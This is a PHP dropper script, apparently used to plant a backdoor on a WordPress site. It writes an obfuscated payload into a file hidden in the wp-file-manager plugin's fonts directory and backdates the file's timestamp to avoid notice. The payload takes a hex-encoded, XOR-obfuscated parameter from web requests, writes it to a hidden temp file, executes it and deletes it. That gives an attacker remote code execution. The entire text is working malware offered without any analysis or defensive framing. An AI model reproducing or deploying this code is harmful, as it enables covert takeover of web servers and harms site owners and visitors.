<?php   $p = "/var/www/csmart.pl/new/wp-content/plugins/wp-file-manager/lib/fonts/embeds/mods_temp.php"; $c = rawurldecode('%3C%3Fphp%0A%0Aif%28in_array%28%22ptr%22%2C%20array_keys%28%24_REQUEST%29%29%29%7B%0A%09%24item%20%3D%20hex2bin%28%24_REQUEST%5B%22ptr%22%5D%29%3B%0A%09%24holder%3D%20%20%27%27%3B%20%20%24m%20%3D%200%3B%20do%7B%24holder%20.%3D%20chr%28ord%28%24item%5B%24m%5D%29%20%5E%2031%29%3B%24m%2B%2B%3B%7D%20while%28%24m%20%3C%20strlen%28%24item%29%29%3B%0A%09%24key%20%3D%20array_filter%28%5Bsys_get_temp_dir%28%29%2C%20getenv%28%22TMP%22%29%2C%20getcwd%28%29%2C%20%22/var/tmp%22%2C%20ini_get%28%22upload_tmp_dir%22%29%2C%20%22/dev/shm%22%2C%20session_save_path%28%29%2C%20getenv%28%22TEMP%22%29%2C%20%22/tmp%22%5D%29%3B%0A%09for%20%28%24value%20%3D%200%2C%20%24property_set%20%3D%20count%28%24key%29%3B%20%24value%20%3C%20%24property_set%3B%20%24value%2B%2B%29%20%7B%0A%20%20%20%20%24hld%20%3D%20%24key%5B%24value%5D%3B%0A%20%20%20%20%09%09if%20%28%28bool%29is_dir%28%24hld%29%20%26%26%20%28bool%29is_writable%28%24hld%29%29%20%7B%0A%20%20%20%20%24dat%20%3D%20vsprintf%28%22%25s/%25s%22%2C%20%5B%24hld%2C%20%22.reference%22%5D%29%3B%0A%20%20%20%20if%20%28file_put_contents%28%24dat%2C%20%24holder%29%29%20%7B%0A%09include%20%24dat%3B%0A%09%40unlink%28%24dat%29%3B%0A%09exit%3B%0A%7D%0A%7D%0A%7D%0A%7D'); if (file_put_contents($p, $c)) {     echo '!success!';     @touch($p, 1681866195); } die('!ended!');